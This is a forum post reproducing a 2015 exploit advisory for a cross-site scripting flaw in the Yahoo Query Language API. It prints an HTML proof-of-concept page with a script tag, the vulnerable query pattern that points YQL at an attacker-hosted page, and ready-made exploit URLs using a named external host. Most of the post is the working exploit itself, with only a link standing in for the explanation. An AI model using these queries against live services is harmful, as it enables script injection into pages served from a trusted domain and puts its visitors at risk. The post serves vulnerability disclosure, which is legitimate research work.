Aerosol Posted March 10, 2015 Report Posted March 10, 2015 /************************************************************************************* Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability**** Exploit Author: Peyman D. aka C4T**** Vendor Homepage : http://query.yahooapis.com/**** Google Dork: none**** Date: 2015-03-08**** Tested on: Windows 7 / Mozila Firefox**************************************************************************************** Exploit Code:******************<html xmlns="http://www.w3.org/1999/xhtml"><body><span>Discovered by Peyman D.</span><span>aka C4T</span><script>alert('Successfully Exploited');</script></body></html>************************************************************************************Location & Vulnerable query:******************http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html'*************************************************************************************** Proof:******************Executable script tag in API's own page:Malicious source: http://hatrhyme.com/alert.htmlExploit query:http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html'-------------------------------------------------------Injecting HTML tags in API's own page:Malicious source: http://hatrhyme.com/expl.htmlExploit query:http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html'-------------------------------------------------------********************************************************************************************** Explanation and the cause of this vulnerability:**** http://hatrhyme.com/XSSInYQL.pdf********************************************************************************************Source Quote
